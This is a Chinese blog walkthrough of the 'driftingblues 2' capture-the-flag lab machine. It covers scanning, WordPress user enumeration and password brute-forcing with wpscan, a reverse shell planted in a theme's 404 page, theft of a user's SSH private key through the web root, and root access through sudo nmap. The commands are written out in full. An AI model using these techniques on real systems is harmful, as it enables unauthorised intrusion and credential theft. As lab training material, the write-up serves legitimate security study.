driftingblues 2靶机wp

主机探活

nmap -sP 192.168.159.0/24 

目标主机IP为:192.168.159.165


端口发现

nmap -sP 192.168.159.0/24

在这里插入图片描述

开放端口为:21、22、80端口


21端口

匿名登陆
ftp 192.168.159.165

在这里插入图片描述

成功登录


查看,信息收集

在这里插入图片描述

发现只有一张图片,下载后也没有发现什么有用的信息,就一普通图片

在这里插入图片描述


80端口

nikto
nikto -h 192.168.159.165

在这里插入图片描述

发现该网站下有一个 blog,且是 wordpress 搭建的


目录扫描
dirsearch -u 192.168.159.165

在这里插入图片描述

扫出了一个 blog 网站,访问一下

在这里插入图片描述

发现未加载 css 等信息,猜测有一个域名,浏览源码,找到域名

在这里插入图片描述

driftingblues.box


写到本地 hosts文件中,再次访问

在这里插入图片描述

在这里插入图片描述


对 blog 再做一次目录扫描

http://driftingblues.box/blog/

在这里插入图片描述

基本可以确定是 wordpress 了,我对这些路径都进行了访问与信息收集,但是没有获得什么有效信息(只获得了登录页面可以爆破用户名)


wpscan

使用 wpscan 工具来对 wordpress 站点进行扫描(主要就是用来爆破用户名和密码)(也可以用burpsuite爆破,我为了了解下这个工具,所以用工具了)

apt-get install wpscan -y	# 下载
wpscan --help		# 查看参数

在这里插入图片描述


wpscan --url http://driftingblues.box/blog -e u 
# --url  指定目标url
# -e 爆破模式	-u 爆破用户名

在这里插入图片描述

用户名:albert


wpscan --url http://driftingblues.box/blog -e u -P /usr/share/wordlists/rockyou.txt		# 爆破密码

在这里插入图片描述

用户名:albert 密码:scotland1


访问http://driftingblues.box/blog/wp-login.php,输入账户密码,成功登录

在这里插入图片描述

这个网站提供了网站风格的配置选项,我们查看一下(Appearance --> Theme File Editor)

在这里插入图片描述


我们修改它的 404 notfound 页面

在这里插入图片描述


改为反弹shll的php代码

在这里插入图片描述


本机打开端口监听,并随便访问一个不存在的网址,如:driftingblues.box/blog/index.php/202/17/crosscut-saw/

nc -nlvp 7777

1

成功获取shell


提权

setuid
find / -perm -u=s -type f 2>/dev/null

没有可以利用的东西。。。


计划任务
crontab -l
cat /etc/crontab

也没有可用信息。。。


sudo
sudo -l

没有可用信息。。。


信息收集

如图,在 /home 目录下找到一个用户,可读可执行

之后在该用户目录中发现存在 ssh 配置文件夹,且可读可执行

在这里插入图片描述


进入 .ssh 文件夹,发现存在公私钥信息文件,且私钥文件可读可执行

在这里插入图片描述


ssh

将该私钥文件移入web目录下,主机进行下载

cd /var/www/html/blog
cp /home/freddie/.ssh/id_rsa .

在这里插入图片描述


wget http://driftingblues.box/blog/id_rsa

在这里插入图片描述


ssh远程连接,用户名:freddie

ssh 192.168.159.165 -l freddie -i id_rsa 

在这里插入图片描述


发现无法成功连接,给出的提示信息时 id_rsa 太 open 了,要求该文件不能被其他文件访问,所以要修改该文件的权限

# 直接把权限改为 400
chmod 400 id_rsa

在这里插入图片描述


重新连接,成功登录

在这里插入图片描述


sudo-nmap
sudo -l

在这里插入图片描述


可以利用 nmap 提权,访问 https://gtfobins.github.io/gtfobins/nmap/ 找到提权方式

在这里插入图片描述


选择一个进行提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

成功获取 root 权限

在这里插入图片描述


换个友好的命令行

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

结束!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值